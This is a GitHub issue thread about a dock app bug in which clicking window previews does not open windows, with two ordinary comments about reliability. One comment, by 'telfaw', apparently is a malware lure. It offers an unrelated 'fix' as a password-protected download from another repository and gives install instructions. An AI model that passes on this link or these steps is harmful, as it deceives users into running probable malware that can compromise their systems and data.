### ISSUE TITLE
clicking on app previews doesn't open the window

### ISSUE THREAD

**Issue by deepai-org** [Deep-ai-inc/dockyswift#3]
the click handler doesn't seem to be firing, for unknown reasons

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bmorphism** [comment]
need to improve reliability and needs to work with a single click (right now two clicks required)

may be related #2
